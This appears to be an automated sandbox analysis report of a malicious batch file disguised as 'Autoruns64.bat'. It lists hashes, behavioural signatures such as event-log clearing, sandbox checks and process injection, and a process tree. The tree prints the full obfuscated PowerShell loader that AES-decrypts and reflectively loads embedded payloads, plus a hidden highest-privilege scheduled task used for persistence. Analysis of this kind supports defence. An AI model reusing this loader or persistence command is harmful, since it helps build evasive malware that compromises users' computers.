Analysis
-
max time kernel
43s -
max time network
41s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system -
submitted
13/10/2024, 12:17
Static task
static1
Behavioral task
behavioral1
Sample
Autoruns64.bat
Resource
win10v2004-20241007-en
General
-
Target
Autoruns64.bat
-
Size
2.8MB
-
MD5
584382c704d89b38304612ee425a852f
-
SHA1
9d842c7c34bb0c6a00eea6f68ac278bb1ace926c
-
SHA256
a01df00146e7c4c1d921a912c1791a32531093f570575005c0d2088c4e00afae
-
SHA512
8055b34e651be041fb68f28e1731e6e09d1d400de7fd0b1eac40d2d9061057405170dfd1fbed0b4e968dd79bd185e9a41120c058880f614239792c9558bfe85c
-
SSDEEP
49152:0GKnII7kx63o02hXAQlJUdJwjnJnjyEUr:0F
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
- PID 3708 powershell.exe
- PID 4476 powershell.exe
- PID 3788 powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation (WScript.exe)
-
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
- File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx (svchost.exe)
- File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx (svchost.exe)
-
Drops file in System32 directory 1 IoCs
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 (svchost.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 (taskmgr.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
-
Modifies registry class 1 IoCs
- Key created: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings (powershell.exe)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
- PID 3788 powershell.exe
- PID 3708 powershell.exe
- PID 4476 powershell.exe
- PID 2576 taskmgr.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
- PID 3492 Explorer.EXE
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
- PID 3788 powershell.exe: SeDebugPrivilege
- PID 3708 powershell.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
-
Suspicious use of FindShellTrayWindow 40 IoCs
- PID 2576 taskmgr.exe
- PID 3492 Explorer.EXE
-
Suspicious use of SendNotifyMessage 38 IoCs
- PID 2576 taskmgr.exe
- PID 3492 Explorer.EXE
-
Suspicious use of WriteProcessMemory 63 IoCs
- PID 3824 cmd.exe wrote to memory of PID 4344 and PID 3788
- PID 3788 powershell.exe wrote to memory of PID 3708 and PID 1472
- PID 1472 WScript.exe wrote to memory of PID 1416
- PID 1416 cmd.exe wrote to memory of PID 2600 and PID 4476
- PID 4476 powershell.exe wrote to memory of PIDs 3492, 1180, 1372, 976, 1960, 1756, 3128, 1548, 1152, 2328, 3768, 1920, 1720, 2704, 1520, 1912, 2340, 528, 920, 1312, 2680, 916, 2488, 2876, 1500, 3664, 2480, 1100, 812, 1092, 1288, 1668, 1108, 2064, 4616, 4992, 4004, 3412, 2820, 1824, 2792, 2192, 1992, 1400, 2112, 1780, 1384
- PID 3492 Explorer.EXE wrote to memory of PID 2576
Processes
- C:\Windows\system32\svchost.exe -k DcomLaunch -p  (PID 812)
- C:\Windows\system32\svchost.exe -k RPCSS -p  (PID 920)
- C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM  (PID 976)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  (PID 528)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts  (PID 916)
- C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p  (PID 1092)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService  (PID 1100)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc  (PID 1108)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule  (PID 1152)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  (PID 1180)
  - Indicator Removal: Clear Windows Event Logs
- C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  (PID 1288)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  (PID 1312)
- C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc  (PID 1372)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  (PID 1384)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  (PID 1500)
- C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  (PID 1520)
- C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  (PID 1548)
- C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc  (PID 1668)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  (PID 1720)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  (PID 1756)
- C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm  (PID 1780)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  (PID 1824)
- C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache  (PID 1912)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  (PID 1920)
- C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository  (PID 1960)
- C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  (PID 1992)
- C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p  (PID 2064)
- C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  (PID 2112)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc  (PID 2192)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  (PID 2340)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  (PID 2480)
- C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  (PID 2488)
- C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc  (PID 2680)
  - Drops file in System32 directory
- C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  (PID 2704)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  (PID 2792)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  (PID 2820)
- C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  (PID 2876)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker  (PID 3128)
- C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  (PID 3412)
- C:\Windows\Explorer.EXE  (PID 3492)
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Autoruns64.bat"  (PID 3824)
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2ZEQG0G+BjYSP/d9Z3fmCz2qBG/BXDTNnZDQOO/rA/k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KVEkCIBzeHYcZKu9+A9NfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gaabE=New-Object System.IO.MemoryStream(,$param_var); $JINMt=New-Object System.IO.MemoryStream; $pBZVp=New-Object System.IO.Compression.GZipStream($gaabE, [IO.Compression.CompressionMode]::Decompress); $pBZVp.CopyTo($JINMt); $pBZVp.Dispose(); $gaabE.Dispose(); $JINMt.Dispose(); $JINMt.ToArray();}function execute_function($param_var,$param2_var){ $gnVIQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MHenX=$gnVIQ.EntryPoint; $MHenX.Invoke($null, $param2_var);}$wIXko = 'C:\Users\Admin\AppData\Local\Temp\Autoruns64.bat';$host.UI.RawUI.WindowTitle = $wIXko;$LSkmM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wIXko).Split([Environment]::NewLine);foreach ($kcaTq in $LSkmM) { if ($kcaTq.StartsWith('KmkUptOWyBfWLjCsREUP')) { $sErRx=$kcaTq.Substring(20); break; }}$payloads_var=[string[]]$sErRx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "  (PID 4344)
    - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden  (PID 3788)
      - Command and Scripting Interpreter: PowerShell
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_802_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force  (PID 3708)
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.vbs"  (PID 1472)
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.bat" "  (PID 1416)
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2ZEQG0G+BjYSP/d9Z3fmCz2qBG/BXDTNnZDQOO/rA/k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KVEkCIBzeHYcZKu9+A9NfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gaabE=New-Object System.IO.MemoryStream(,$param_var); $JINMt=New-Object System.IO.MemoryStream; $pBZVp=New-Object System.IO.Compression.GZipStream($gaabE, [IO.Compression.CompressionMode]::Decompress); $pBZVp.CopyTo($JINMt); $pBZVp.Dispose(); $gaabE.Dispose(); $JINMt.Dispose(); $JINMt.ToArray();}function execute_function($param_var,$param2_var){ $gnVIQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MHenX=$gnVIQ.EntryPoint; $MHenX.Invoke($null, $param2_var);}$wIXko = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.bat';$host.UI.RawUI.WindowTitle = $wIXko;$LSkmM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wIXko).Split([Environment]::NewLine);foreach ($kcaTq in $LSkmM) { if ($kcaTq.StartsWith('KmkUptOWyBfWLjCsREUP')) { $sErRx=$kcaTq.Substring(20); break; }}$payloads_var=[string[]]$sErRx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "  (PID 2600)
          - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden  (PID 4476)
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
  - "C:\Windows\system32\taskmgr.exe" /4  (PID 2576)
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
- C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc  (PID 3664)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc  (PID 4616)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc  (PID 2328)
- C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV  (PID 4004)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc  (PID 3768)
- C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager  (PID 4992)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc  (PID 1400)